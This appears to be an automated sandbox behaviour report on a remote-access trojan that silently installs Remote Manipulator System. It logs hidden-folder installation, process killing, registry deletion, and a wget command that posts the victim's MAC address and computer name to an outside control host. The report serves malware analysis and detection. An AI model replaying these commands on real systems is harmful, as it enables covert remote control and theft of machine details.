PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 688 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\123.cmd" "

C:\Users\Admin\AppData\Local\Temp\set.exe

set.exe -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 31528171DB5E24A7714E18760929B627

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=E6-1A-A6-25-4D-84&comp=VQVVOAJK&id[...]group=download" http://rms.admin-ru.ru/updater.php -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-28 14:45

Reported

2022-01-28 14:59

Platform

win10-en-20211208

Max time kernel

179s

Max time network

210s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\MSIAC54.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AB7AA605-500F-4153-8207-FB5563419112} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f77a36e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f77a36b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77a36b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB4D1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall" C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
